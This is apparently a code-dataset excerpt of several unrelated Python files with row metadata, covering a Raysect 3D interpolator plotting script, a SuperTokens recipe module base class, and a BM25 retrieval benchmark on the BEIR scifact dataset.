Y_EXTRAP_DELTA_MAX, EXTRAPOLATION_RANGE, large_extrapolation_range, Z_LOWER, Z_UPPER, \
NB_ZSAMPLES, NB_Z, Z_EXTRAP_DELTA_MAX, N_EXTRAPOLATION, uneven_linspace
# Force scientific format to get the right number of significant figures
np.set_printoptions(30000, linewidth=100, formatter={'float': lambda x_str: format(x_str, '.'+str(PRECISION)+'E')},
threshold=sys.maxsize)
# Overwrite imported values here.
VISUAL_NOT_TESTS = False
if VISUAL_NOT_TESTS:
NB_X = 51
NB_Y = 51
NB_Z = 51
NB_XSAMPLES = 101
NB_YSAMPLES = 101
NB_ZSAMPLES = 101
X_EXTRAP_DELTA_MIN = 0.04
Y_EXTRAP_DELTA_MIN = 0.04
Z_EXTRAP_DELTA_MIN = 0.04
BIG_VALUE_FACTOR = 20.
SMALL_VALUE_FACTOR = -20.
def docstring_test():
"""
.. code-block:: python
>>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
>>>
>>> x = np.linspace(-1., 1., 20)
>>> y = np.linspace(-1., 1., 20)
>>> z = np.linspace(-1., 1., 20)
>>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij')
>>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2))
>>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0)
>>> # Interpolation
>>> interpolator3D(1.0, 1.0, 0.2)
0.1300281183136766
>>> # Extrapolation
>>> interpolator3D(1.0, 1.0, 1.1)
0.0497870683678659
>>> # Extrapolation out of bounds
>>> interpolator3D(1.0, 1.0, 2.1)
ValueError: The specified value (z=2.1) is outside of extrapolation range.
"""
pass
def get_extrapolation_input_values(
x_lower, x_upper, y_lower, y_upper, z_lower, z_upper, x_extrap_delta_max, y_extrap_delta_max,
z_extrap_delta_max, x_extrap_delta_min, y_extrap_delta_min, z_extrap_delta_min):
xsamples_extrap_out_of_bounds_options = np.array(
[x_lower - x_extrap_delta_max, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_max])
ysamples_extrap_out_of_bounds_options = np.array(
[y_lower - y_extrap_delta_max, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_max])
zsamples_extrap_out_of_bounds_options = np.array(
[z_lower - z_extrap_delta_max, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_max])
xsamples_extrap_in_bounds_options = np.array(
[x_lower - x_extrap_delta_min, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_min])
ysamples_extrap_in_bounds_options = np.array(
[y_lower - y_extrap_delta_min, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_min])
zsamples_extrap_in_bounds_options = np.array(
[z_lower - z_extrap_delta_min, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_min])
xsamples_extrap_out_of_bounds = []
ysamples_extrap_out_of_bounds = []
zsamples_extrap_out_of_bounds = []
xsamples_extrap_in_bounds = []
ysamples_extrap_in_bounds = []
zsamples_extrap_in_bounds = []
edge_indicies_x = [0, len(xsamples_extrap_out_of_bounds_options) - 1]
edge_indicies_y = [0, len(ysamples_extrap_out_of_bounds_options) - 1]
edge_indicies_z = [0, len(zsamples_extrap_out_of_bounds_options) - 1]
for i_x in range(len(xsamples_extrap_out_of_bounds_options)):
for j_y in range(len(ysamples_extrap_out_of_bounds_options)):
for k_z in range(len(zsamples_extrap_out_of_bounds_options)):
if not (i_x not in edge_indicies_x and j_y not in edge_indicies_y and k_z not in edge_indicies_z):
xsamples_extrap_out_of_bounds.append(xsamples_extrap_out_of_bounds_options[i_x])
ysamples_extrap_out_of_bounds.append(ysamples_extrap_out_of_bounds_options[j_y])
zsamples_extrap_out_of_bounds.append(zsamples_extrap_out_of_bounds_options[k_z])
xsamples_extrap_in_bounds.append(xsamples_extrap_in_bounds_options[i_x])
ysamples_extrap_in_bounds.append(ysamples_extrap_in_bounds_options[j_y])
zsamples_extrap_in_bounds.append(zsamples_extrap_in_bounds_options[k_z])
return \
np.array(xsamples_extrap_out_of_bounds), np.array(ysamples_extrap_out_of_bounds), \
np.array(zsamples_extrap_out_of_bounds), np.array(xsamples_extrap_in_bounds), \
np.array(ysamples_extrap_in_bounds), np.array(zsamples_extrap_in_bounds)
def pcolourmesh_corners(input_array):
return np.concatenate((input_array[:-1] - np.diff(input_array)/2.,
np.array([input_array[-1] - (input_array[-1] - input_array[-2]) / 2.,
input_array[-1] + (input_array[-1] - input_array[-2]) / 2.])), axis=0)
def function_to_spline(x_input, y_input, z_input, factor_in):
t = np.pi * np.sqrt((x_input ** 2 + y_input ** 2 + z_input ** 2))
return factor_in*np.sinc(t)
if __name__ == '__main__':
# Calculate for big values, small values, or normal values
big_values = False
small_values = True
log_scale = False
uneven_spacing = False
use_saved_datastore_spline_knots = True
verbose_options = [False, True, False, False]
if VISUAL_NOT_TESTS:
index_x_in = 40
else:
index_x_in = 4
index_y_in = 0
index_z_in = 0
index_y_plot = 0
index_z_plot = 0
print('Using scipy version', scipy.__version__)
# Find the function values to be used
if big_values:
factor = np.power(10., BIG_VALUE_FACTOR)
elif small_values:
factor = np.power(10., SMALL_VALUE_FACTOR)
else:
factor = 1.
if uneven_spacing:
x_in = uneven_linspace(X_LOWER, X_UPPER, NB_X, offset_fraction=1./3.)
y_in = uneven_linspace(Y_LOWER, Y_UPPER, NB_Y, offset_fraction=1./3.)
z_in = uneven_linspace(Z_LOWER, Z_UPPER, NB_Z, offset_fraction=1./3.)
else:
x_in = np.linspace(X_LOWER, X_UPPER, NB_X)
y_in = np.linspace(Y_LOWER, Y_UPPER, NB_Y)
z_in = np.linspace(Z_LOWER, Z_UPPER, NB_Z)
x_in_full, y_in_full, z_in_full = np.meshgrid(x_in, y_in, z_in, indexing='ij')
f_in = function_to_spline(x_in_full, y_in_full, z_in_full, factor)
if use_saved_datastore_spline_knots:
if uneven_spacing:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValuesUneven()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValuesUneven()
else:
reference_loaded_values = TestInterpolatorLoadNormalValuesUneven()
else:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValues()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValues()
else:
reference_loaded_values = TestInterpolatorLoadNormalValues()
f_in = reference_loaded_values.data
if verbose_options[0]:
print('Save this to self.data in test_interpolator:\n', repr(f_in))
xsamples = np.linspace(X_LOWER, X_UPPER, NB_XSAMPLES)
ysamples = np.linspace(Y_LOWER, Y_UPPER, NB_YSAMPLES)
zsamples = np.linspace(Z_LOWER, Z_UPPER, NB_ZSAMPLES)
xsamples_extrapolation, ysamples_extrapolation, zsamples_extrapolation = large_extrapolation_range(
xsamples, ysamples, zsamples, EXTRAPOLATION_RANGE, N_EXTRAPOLATION
)
# # Extrapolation x and y values
xsamples_out_of_bounds, ysamples_out_of_bounds, zsamples_out_of_bounds, xsamples_in_bounds, ysamples_in_bounds, \
zsamples_in_bounds = get_extrapolation_input_values(
X_LOWER, X_UPPER, Y_LOWER, Y_UPPER, Z_LOWER, Z_UPPER, X_EXTRAP_DELTA_MAX, Y_EXTRAP_DELTA_MAX,
Z_EXTRAP_DELTA_MAX, X_EXTRAP_DELTA_MIN, Y_EXTRAP_DELTA_MIN, Z_EXTRAP_DELTA_MIN
)
interpolator3D = Interpolator3DArray(x_in, y_in, z_in, f_in, 'linear', 'linear', extrapolation_range_x=2.0,
extrapolation_range_y=2.0, extrapolation_range_z=2.0)
if VISUAL_NOT_TESTS:
n_lower_upper_interp = 51
else:
n_lower_upper_interp = 19
n_lower = 50
lower_p = 0.9
xsamples_lower_and_upper = np.linspace(X_LOWER, X_UPPER, n_lower_upper_interp)
ysamples_lower_and_upper = np.linspace(Y_LOWER, Y_UPPER, n_lower_upper_interp)
zsamples_lower_and_upper = np.linspace(Z_LOWER, Z_UPPER, n_lower_upper_interp)
xsamples_lower_and_upper = np.concatenate((np.linspace(X_LOWER - (X_UPPER - X_LOWER) * lower_p, X_LOWER, n_lower)[
:-1], xsamples_lower_and_upper,
np.linspace(X_UPPER, X_UPPER + (X_UPPER - X_LOWER) * lower_p, n_lower)[
1:]))
ysamples_lower_and_upper = np.concatenate((np.linspace(Y_LOWER - (Y_UPPER - Y_LOWER) * lower_p, Y_LOWER, n_lower)[
:-1], ysamples_lower_and_upper,
np.linspace(Y_UPPER, Y_UPPER + (Y_UPPER - Y_LOWER) * lower_p, n_lower)[
1:]))
zsamples_lower_and_upper = np.concatenate((np.linspace(Z_LOWER - (Z_UPPER - Z_LOWER) * lower_p, Z_LOWER, n_lower)[
:-1], zsamples_lower_and_upper,
np.linspace(Z_UPPER, Z_UPPER + (Z_UPPER - Z_LOWER) * lower_p, n_lower)[
1:]))
index_ysamples_lower_upper = np.where(y_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# extrapolation output values to be saved for the tests
f_extrapolation_output = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_extrapolation_output[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[1]:
print('Output of extrapolation to be saved:\n', repr(f_extrapolation_output))
check_plot = True
if check_plot:
import matplotlib.pyplot as plt
from matplotlib import cm
# Install mayavi and pyQt5
main_plots_on = True
if main_plots_on:
fig, ax = plt.subplots(1, 4)
fig1, ax1 = plt.subplots(1, 2)
if not (x_in[index_x_in] == xsamples).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
if not (y_in[index_y_in] == ysamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
index_xsamples = np.where(x_in[index_x_in] == xsamples)[0].item()
index_ysamples_lower_upper = np.where(y_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# index_ysamples_lower_upper = 0
# index_zsamples_lower_upper = 0
index_zsamples_lower_upper = np.where(z_in[index_z_in] == zsamples_lower_and_upper)[0].item()
f_plot_x = f_in[index_x_in, :, :]
y_corners_x = pcolourmesh_corners(y_in)
z_corners_x = pcolourmesh_corners(z_in)
min_colourmap = np.min(f_in)
max_colourmap = np.max(f_in)
if log_scale:
c_norm = SymLogNorm(vmin=min_colourmap, vmax=max_colourmap, linthresh=0.03)
else:
c_norm = Normalize(vmin=min_colourmap, vmax=max_colourmap)
colourmap = cm.get_cmap('viridis', 512)
ax[0].pcolormesh(y_corners_x, z_corners_x, f_plot_x, norm=c_norm, cmap='viridis')
# ax[0].pcolormesh(y_in, z_in, f_plot_x)
ax[0].set_aspect('equal')
f_out = np.zeros((len(xsamples), len(ysamples), len(zsamples)))
for i in range(len(xsamples)):
for j in range(len(ysamples)):
for k in range(len(zsamples)):
f_out[i, j, k] = interpolator3D(xsamples[i], ysamples[j], zsamples[k])
if verbose_options[2]:
print('Test interpolation:\n', repr(f_out))
f_out_lower_and_upper = np.zeros((len(xsamples_lower_and_upper), len(ysamples_lower_and_upper),
len(zsamples_lower_and_upper)))
for i in range(len(xsamples_lower_and_upper)):
for j in range(len(ysamples_lower_and_upper)):
for k in range(len(zsamples_lower_and_upper)):
f_out_lower_and_upper[i, j, k] = interpolator3D(
xsamples_lower_and_upper[i], ysamples_lower_and_upper[j], zsamples_lower_and_upper[k]
)
f_out_extrapolation = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_out_extrapolation[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[3]:
print('New output of extrapolation to be saved:\n', repr(f_out_extrapolation))
index_xsamples_extrap = np.where(x_in[index_x_in] == xsamples_extrapolation)
f_out_x_extrapolation = f_out_extrapolation[index_xsamples_extrap]
im = ax[3].scatter(
ysamples_extrapolation[index_xsamples_extrap], zsamples_extrapolation[index_xsamples_extrap],
c=f_out_x_extrapolation, norm=c_norm, cmap='viridis', s=10
)
ax[3].set_aspect('equal')
f_out_x = f_out[index_xsamples, :, :]
ysamples_mesh, zsamples_mesh = np.meshgrid(ysamples, zsamples)
ax[0].scatter(
ysamples_mesh.ravel(), zsamples_mesh.ravel(), c=f_out_x.ravel(), norm=c_norm, cmap='viridis', s=10
)
index_y_print = -1
index_z_print = 0
index_ysamples_print = np.where(y_in[index_y_print] == ysamples)[0].item()
index_zsamples_print = np.where(z_in[index_z_print] == zsamples)[0].item()
ax[0].set_title('Slice of x', size=20)
ax[1].set_title(f'Interpolated points \nin slice of x={x_in[index_x_in]}', size=20)
y_corners_xsamples = pcolourmesh_corners(ysamples)
z_corners_xsamples = pcolourmesh_corners(zsamples)
im2 = ax[1].pcolormesh(y_corners_xsamples, z_corners_xsamples, f_out_x, norm=c_norm, cmap='viridis')
ax[1].set_aspect('equal')
if not (x_in[index_x_in] == xsamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, n_lower_upper={n_lower}-1, must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1,'
f' NB_Z={NB_Z}-1'
)
index_xsamples_lower_and_upper = np.where(x_in[index_x_in] == xsamples_lower_and_upper)[0].item()
y_corners_xsamples_lower_and_upper = pcolourmesh_corners(ysamples_lower_and_upper)
z_corners_xsamples_lower_and_upper = pcolourmesh_corners(zsamples_lower_and_upper)
f_out_lower_and_upper_x = f_out_lower_and_upper[index_xsamples_lower_and_upper, :, :]
im3 = ax[2].pcolormesh(
y_corners_xsamples_lower_and_upper, z_corners_xsamples_lower_and_upper, f_out_lower_and_upper_x,
norm=c_norm, cmap='viridis'
)
check_array_z = np.zeros(len(zsamples_lower_and_upper))
check_array_y = np.zeros(len(ysamples_lower_and_upper))
for i in range(len(zsamples_lower_and_upper)):
check_array_z[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[index_ysamples_lower_upper], zsamples_lower_and_upper[i]
)
check_array_y[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[i], zsamples_lower_and_upper[index_zsamples_lower_upper]
)
ax1[0].plot(zsamples_lower_and_upper, f_out_lower_and_upper_x[index_ysamples_lower_upper, :])
ax1[0].plot(z_in, f_in[index_x_in, index_y_in, :], 'bo')
ax1[0].plot(zsamples_lower_and_upper, check_array_z, 'gx')
ax1[1].plot(ysamples_lower_and_upper, check_array_y)
# ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot])
ax1[0].axvline(z_in[0], color='r', linestyle='--')
ax1[0].axvline(z_in[-1], color='r', linestyle='--')
ax1[1].axvline(y_in[0], color='r', linestyle='--')
ax1[1].axvline(y_in[-1], color='r', linestyle='--')
fig.colorbar(im, ax=ax[0])
fig.colorbar(im2, ax=ax[1])
fig.colorbar(im3, ax=ax[2])
ax[2].set_aspect('equal')
plt.show()
| en | 0.562232 | # Copyright (c) 2014-2021, Dr <NAME>, Raysect Project # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the Raysect Project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # Force scientific format to get the right number of significant figures # Overwrite imported values here. .. code-block:: python >>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray >>> >>> x = np.linspace(-1., 1., 20) >>> y = np.linspace(-1., 1., 20) >>> z = np.linspace(-1., 1., 20) >>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij') >>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2)) >>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0) >>> # Interpolation >>> interpolator3D(1.0, 1.0, 0.2) 0.1300281183136766 >>> # Extrapolation >>> interpolator3D(1.0, 1.0, 1.1) 0.0497870683678659 >>> # Extrapolation out of bounds >>> interpolator3D(1.0, 1.0, 2.1) ValueError: The specified value (z=2.1) is outside of extrapolation range. # Calculate for big values, small values, or normal values # Find the function values to be used # # Extrapolation x and y values # extrapolation to save # Install mayavi and pyQt5 # index_ysamples_lower_upper = 0 # index_zsamples_lower_upper = 0 # ax[0].pcolormesh(y_in, z_in, f_plot_x) # ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot]) | 1.473447 | 1 |
supertokens_python/recipe_module.py | girish946/supertokens-python | 36 | 8544 | # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import abc
from typing import Union, List, TYPE_CHECKING
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .framework.response import BaseResponse
if TYPE_CHECKING:
from supertokens_python.framework.request import BaseRequest
from .supertokens import AppInfo
from .normalised_url_path import NormalisedURLPath
from .exceptions import SuperTokensError
class RecipeModule(abc.ABC):
def __init__(self, recipe_id: str, app_info: AppInfo):
self.recipe_id = recipe_id
self.app_info = app_info
def get_recipe_id(self):
return self.recipe_id
def get_app_info(self):
return self.app_info
def return_api_id_if_can_handle_request(
self, path: NormalisedURLPath, method: str) -> Union[str, None]:
apis_handled = self.get_apis_handled()
for current_api in apis_handled:
if not current_api.disabled and current_api.method == method and self.app_info.api_base_path.append(
current_api.path_without_api_base_path).equals(path):
return current_api.request_id
return None
@abc.abstractmethod
def is_error_from_this_recipe_based_on_instance(self, err):
pass
@abc.abstractmethod
def get_apis_handled(self) -> List[APIHandled]:
pass
@abc.abstractmethod
async def handle_api_request(self, request_id: str, request: BaseRequest, path: NormalisedURLPath, method: str,
response: BaseResponse):
pass
@abc.abstractmethod
async def handle_error(self, request: BaseRequest, err: SuperTokensError, response: BaseResponse):
pass
@abc.abstractmethod
def get_all_cors_headers(self):
pass
class APIHandled:
def __init__(self, path_without_api_base_path: NormalisedURLPath,
method: Literal['post', 'get', 'delete', 'put', 'options', 'trace'], request_id: str, disabled: bool):
self.path_without_api_base_path = path_without_api_base_path
self.method = method
self.request_id = request_id
self.disabled = disabled
| # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import abc
from typing import Union, List, TYPE_CHECKING
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .framework.response import BaseResponse
if TYPE_CHECKING:
from supertokens_python.framework.request import BaseRequest
from .supertokens import AppInfo
from .normalised_url_path import NormalisedURLPath
from .exceptions import SuperTokensError
class RecipeModule(abc.ABC):
def __init__(self, recipe_id: str, app_info: AppInfo):
self.recipe_id = recipe_id
self.app_info = app_info
def get_recipe_id(self):
return self.recipe_id
def get_app_info(self):
return self.app_info
def return_api_id_if_can_handle_request(
self, path: NormalisedURLPath, method: str) -> Union[str, None]:
apis_handled = self.get_apis_handled()
for current_api in apis_handled:
if not current_api.disabled and current_api.method == method and self.app_info.api_base_path.append(
current_api.path_without_api_base_path).equals(path):
return current_api.request_id
return None
@abc.abstractmethod
def is_error_from_this_recipe_based_on_instance(self, err):
pass
@abc.abstractmethod
def get_apis_handled(self) -> List[APIHandled]:
pass
@abc.abstractmethod
async def handle_api_request(self, request_id: str, request: BaseRequest, path: NormalisedURLPath, method: str,
response: BaseResponse):
pass
@abc.abstractmethod
async def handle_error(self, request: BaseRequest, err: SuperTokensError, response: BaseResponse):
pass
@abc.abstractmethod
def get_all_cors_headers(self):
pass
class APIHandled:
def __init__(self, path_without_api_base_path: NormalisedURLPath,
method: Literal['post', 'get', 'delete', 'put', 'options', 'trace'], request_id: str, disabled: bool):
self.path_without_api_base_path = path_without_api_base_path
self.method = method
self.request_id = request_id
self.disabled = disabled
| en | 0.896635 | # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved. # # This software is licensed under the Apache License, Version 2.0 (the # "License") as published by the Apache Software Foundation. # # You may not use this file except in compliance with the License. You may # obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. | 1.94416 | 2 |
tests/__init__.py | mihaidumitrescu/flake8-html | 36 | 8545 | <filename>tests/__init__.py
# -*- coding: utf-8 -*-
"""Tests go in this directory."""
| <filename>tests/__init__.py
# -*- coding: utf-8 -*-
"""Tests go in this directory."""
| en | 0.908211 | # -*- coding: utf-8 -*- Tests go in this directory. | 1.11441 | 1 |
datajoint-workflow/{{cookiecutter.github_repo}}/src/{{cookiecutter.__pkg_import_name}}/version.py | Yambottle/dj-workflow-template | 0 | 8546 | __version__ = "{{cookiecutter._pkg_version}}"
| __version__ = "{{cookiecutter._pkg_version}}"
| none | 1 | 1.156341 | 1 |
|
examples/benchmarking/benchmark_bm25.py | shibing624/similarities | 16 | 8547 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import datetime
import os
import pathlib
import random
import sys
from loguru import logger
sys.path.append('../..')
from similarities import BM25Similarity
from similarities.utils import http_get
from similarities.data_loader import SearchDataLoader
from similarities.evaluation import evaluate
random.seed(42)
pwd_path = os.path.dirname(os.path.realpath(__file__))
def get_scifact():
# Download scifact.zip dataset and unzip the dataset
dataset = "scifact"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "scifact.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
def get_dbpedia():
dataset = "dbpedia-entity"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "dbpedia-entity.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
data_path = get_scifact()
#### Loading test queries and corpus of the selected dataset
corpus, queries, qrels = SearchDataLoader(data_path).load(split="test")
corpus_ids, query_ids = list(corpus), list(queries)
logger.info(f"corpus: {len(corpus)}, queries: {len(queries)}")
#### Randomly sample 1M pairs from Original Corpus (4.63M pairs)
#### First include all relevant documents (i.e. present in qrels)
corpus_set = set()
for query_id in qrels:
corpus_set.update(list(qrels[query_id].keys()))
corpus_new = {corpus_id: corpus[corpus_id] for corpus_id in corpus_set}
#### Remove already seen k relevant documents and sample (1M - k) docs randomly
remaining_corpus = list(set(corpus_ids) - corpus_set)
sample = min(1000000 - len(corpus_set), len(remaining_corpus))
# sample = 10
for corpus_id in random.sample(remaining_corpus, sample):
corpus_new[corpus_id] = corpus[corpus_id]
corpus_docs = {corpus_id: corpus_new[corpus_id]['title'] + corpus_new[corpus_id]['text'] for corpus_id, corpus in
corpus_new.items()}
#### Index 1M passages into the index (separately)
model = BM25Similarity(corpus_docs)
#### Saving benchmark times
time_taken_all = {}
for query_id in query_ids:
query = {query_id: queries[query_id]}
#### Measure time to retrieve top-10 BM25 documents using single query latency
start = datetime.datetime.now()
q_res = model.most_similar(query, topn=10)
end = datetime.datetime.now()
# print(q_res)
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
time_taken_all[query_id] = time_taken
# logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken))
# logger.info("\tsearch result: {}".format(results[:2]))
time_taken = list(time_taken_all.values())
logger.info("Average time taken: {:.2f}ms".format(sum(time_taken) / len(time_taken_all)))
#### Saving benchmark times with batch
# queries = [queries[query_id] for query_id in query_ids]
start = datetime.datetime.now()
results = model.most_similar(queries, topn=10)
end = datetime.datetime.now()
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
logger.info("All, Spend {:.2f}ms".format(time_taken))
logger.info("Average time taken: {:.2f}ms".format(time_taken / len(queries)))
logger.info(f"Results size: {len(results)}")
#### Evaluate your retrieval using NDCG@k, MAP@K ...
ndcg, _map, recall, precision = evaluate(qrels, results)
logger.info(f"MAP: {_map}")
| # -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import datetime
import os
import pathlib
import random
import sys
from loguru import logger
sys.path.append('../..')
from similarities import BM25Similarity
from similarities.utils import http_get
from similarities.data_loader import SearchDataLoader
from similarities.evaluation import evaluate
random.seed(42)
pwd_path = os.path.dirname(os.path.realpath(__file__))
def get_scifact():
# Download scifact.zip dataset and unzip the dataset
dataset = "scifact"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "scifact.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
def get_dbpedia():
dataset = "dbpedia-entity"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "dbpedia-entity.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
data_path = get_scifact()
#### Loading test queries and corpus of the selected dataset
corpus, queries, qrels = SearchDataLoader(data_path).load(split="test")
corpus_ids, query_ids = list(corpus), list(queries)
logger.info(f"corpus: {len(corpus)}, queries: {len(queries)}")
#### Randomly sample 1M pairs from Original Corpus (4.63M pairs)
#### First include all relevant documents (i.e. present in qrels)
corpus_set = set()
for query_id in qrels:
corpus_set.update(list(qrels[query_id].keys()))
corpus_new = {corpus_id: corpus[corpus_id] for corpus_id in corpus_set}
#### Remove already seen k relevant documents and sample (1M - k) docs randomly
remaining_corpus = list(set(corpus_ids) - corpus_set)
sample = min(1000000 - len(corpus_set), len(remaining_corpus))
# sample = 10
for corpus_id in random.sample(remaining_corpus, sample):
corpus_new[corpus_id] = corpus[corpus_id]
corpus_docs = {corpus_id: corpus_new[corpus_id]['title'] + corpus_new[corpus_id]['text'] for corpus_id, corpus in
corpus_new.items()}
#### Index 1M passages into the index (separately)
model = BM25Similarity(corpus_docs)
#### Saving benchmark times
time_taken_all = {}
for query_id in query_ids:
query = {query_id: queries[query_id]}
#### Measure time to retrieve top-10 BM25 documents using single query latency
start = datetime.datetime.now()
q_res = model.most_similar(query, topn=10)
end = datetime.datetime.now()
# print(q_res)
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
time_taken_all[query_id] = time_taken
# logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken))
# logger.info("\tsearch result: {}".format(results[:2]))
time_taken = list(time_taken_all.values())
logger.info("Average time taken: {:.2f}ms".format(sum(time_taken) / len(time_taken_all)))
#### Saving benchmark times with batch
# queries = [queries[query_id] for query_id in query_ids]
start = datetime.datetime.now()
results = model.most_similar(queries, topn=10)
end = datetime.datetime.now()
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
logger.info("All, Spend {:.2f}ms".format(time_taken))
